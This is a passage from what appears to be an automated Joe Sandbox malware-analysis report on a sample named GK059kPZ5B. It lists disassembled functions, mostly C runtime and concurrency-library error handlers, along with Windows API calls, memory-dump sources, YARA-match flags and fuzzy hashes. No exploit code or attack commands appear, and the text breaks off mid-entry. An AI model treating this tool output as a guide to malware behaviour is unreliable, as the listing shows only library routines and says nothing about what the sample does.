                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                            • String ID:
                                                            • API String ID: 3657713681-0
                                                            • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction ID: 40b7afa646a3d714c9c7aa048d30a38f475436ec43e6df27ef76f268b119d79d
                                                            • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                            • Instruction Fuzzy Hash: 24F09E35E00104A3C724FB50D852C9EB3799ED1B55731851EE80713182DF31AE0EC252
                                                            Function 00412611 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                            • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                            • String ID:
                                                            • API String ID: 3803302727-0
                                                            • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                            • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                            Function 00A62878 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00A6288F
                                                            • GetLastError.KERNEL32(?,?,?,?,00A68850,?,?,?,?,00000000,?,00000000), ref: 00A6289E
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A628B4
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A628C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                            • String ID:
                                                            • API String ID: 3803302727-0
                                                            • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction ID: e224ab44bfd0bdf8c6dd6730ff63b668bf4bd0272c2e0411f690c3805ad039d8
                                                            • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                            • Instruction Fuzzy Hash: 6DF0E53494020ABBCF00EFA4CE45FAF3B786B00702F600625B614E20E1DB35DA0497A4
                                                            Function 00A55A8C Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A55AA8
                                                            • __Cnd_signal.LIBCPMT ref: 00A55AB4
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A55AC9
                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00A55AD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                            • String ID:
                                                            • API String ID: 2059591211-0
                                                            • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction ID: 974ae79d430bd0ee4721d1618c8fef473300c4e47f36ee72ffba90d928e7dcc7
                                                            • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction Fuzzy Hash: EDF0EC32400701AFEB317770CE1775E73B0BF40326F14455CF8565A592DFB5A94C9651
                                                            Function 00412336 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                            • String ID:
                                                            • API String ID: 200240550-0
                                                            • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                            • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                            Function 00A6259D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___crtCreateEventExW.LIBCPMT ref: 00A625B3
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00A60DC0), ref: 00A625C1
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A625D7
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A625E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                            • String ID:
                                                            • API String ID: 200240550-0
                                                            • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction ID: fd1acea733a1922d2d317b026e998787437bfdebd26b05bba027b98c10fb5f70
                                                            • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                            • Instruction Fuzzy Hash: 7AE04F61A402192AE720B7758D17FBB36AC9B00B42F984865FE1AE50C3FDA9D50446A9
                                                            Function 004192E9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                            • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                            • GetLastError.KERNEL32 ref: 004239B1
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3735082963-0
                                                            • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                            • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                            Function 00A69550 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A62979: TlsAlloc.KERNEL32(?,00A60DC0), ref: 00A6297F
                                                            • TlsAlloc.KERNEL32(?,00A60DC0), ref: 00A73C06
                                                            • GetLastError.KERNEL32 ref: 00A73C18
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A73C2E
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A73C3C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3735082963-0
                                                            • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction ID: f94964d792d964270a1db307679df64f113ca9d07aa36faa214ca60ac7795dfd
                                                            • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                            • Instruction Fuzzy Hash: 95E061744003116FC700BB705D4A67A36746600342B10CE36F119D20A2ED34D248575D
                                                            Function 0041254D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412557
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412566
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                            • String ID:
                                                            • API String ID: 3016159387-0
                                                            • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                            • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                            Function 00A627B4 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A60DC0), ref: 00A627BE
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A60DC0), ref: 00A627CD
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A627E3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A627F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                            • String ID:
                                                            • API String ID: 3016159387-0
                                                            • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction ID: 4672f92e92b4ee33605e6b71219e08b5669b134fcfec3a63c26c9b239c5fb802
                                                            • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                            • Instruction Fuzzy Hash: 5AE0807464010DA7C700FBB5DD49FAF77BC6A00B46B600865B505E3051DB68DB048779
                                                            Function 004126A5 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                            • GetLastError.KERNEL32 ref: 004126BD
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                            • String ID:
                                                            • API String ID: 4286982218-0
                                                            • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                            • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                            Function 0041276B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                            • String ID:
                                                            • API String ID: 1964976909-0
                                                            • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                            • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                            Function 00A629D2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,00000000,00A67BF8,00000000,?,?,00A60DC0,?,?,?,00000000,?,00000000), ref: 00A629DE
                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00A629EA
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A62A00
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62A0E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                            • String ID:
                                                            • API String ID: 1964976909-0
                                                            • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction ID: e960e45dec4df997fb95ff5652ed89341ba47fd33a6897f17a582c9d509a475b
                                                            • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                            • Instruction Fuzzy Hash: 54E0863550011967DB10BF64CD0ABBB377C6F00B42F504925B959D10A1DE39D5149799
                                                            Function 00A6290C Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadPriority.KERNEL32(?,?), ref: 00A62918
                                                            • GetLastError.KERNEL32 ref: 00A62924
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A6293A
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62948
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                            • String ID:
                                                            • API String ID: 4286982218-0
                                                            • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction ID: 6d974c292d61b0d2f6ae0ba07e6fa8050ab79a1fb123a889e287c1e075d51ca8
                                                            • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                            • Instruction Fuzzy Hash: FEE0863550011A67CB14BF60CD0ABBB37BC6B00742F504825B519D10A1EE39D504875C
                                                            Function 00412712 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                            • GetLastError.KERNEL32 ref: 00412725
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3103352999-0
                                                            • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                            • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                            Function 00A62979 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsAlloc.KERNEL32(?,00A60DC0), ref: 00A6297F
                                                            • GetLastError.KERNEL32 ref: 00A6298C
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A629A2
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A629B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                            • String ID:
                                                            • API String ID: 3103352999-0
                                                            • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction ID: 8fa92e54238e6894d45e976f144724655289ed13e57df925fe4b55ec0618ecd4
                                                            • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                            • Instruction Fuzzy Hash: 52E0C23444051567C714BB749C4AB7B72786A01762FA40F26F065D20E1EA68D40843A9
                                                            Function 0042F09D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__start
                                                            • String ID: pow
                                                            • API String ID: 3213639722-2276729525
                                                            • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                            • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                            • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                            • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                            Function 0043AE89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ACP$OCP
                                                            • API String ID: 0-711371036
                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                            Function 00A8B0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00A8B34B,?,00000050,?,?,?,?,?), ref: 00A8B1CB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ACP$OCP
                                                            • API String ID: 0-711371036
                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction ID: 1d43618148b4c5b332800effe841fde8a3de93af3aae343094e078a2840e0dfb
                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                            • Instruction Fuzzy Hash: 6621C572B60105A6EB24EF648D29B9773AAEF54B50F568624ED09DF200F732DD40C3B0
                                                            Function 00401F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: EncodersGdipImage$Size
                                                            • String ID: image/png
                                                            • API String ID: 864223233-2966254431
                                                            • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                            • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                            • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                            • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                            Function 00A5F1B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetLastError.KERNEL32(0000000D,?,00A5E0CD,00A5C8E5,?,?,00000000,?,00A5C7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,00A5C8E5), ref: 00A5F236
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: 11@
                                                            • API String ID: 1452528299-1785270423
                                                            • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction ID: e270781544280a79691f188b770301e166baa5e22b00ebf2cc02aab7acf850ac
                                                            • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                            • Instruction Fuzzy Hash: 98118E7A200226AFCF165F64DC489AEBB69FB09B16F104038FE15D6250DA709818DBA0
                                                            Function 00A6DB74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A60F85: RtlEnterCriticalSection.NTDLL ref: 00A60F86
                                                            • List.LIBCONCRT ref: 00A6DBCF
                                                            Strings
                                                            Memory Dump Source
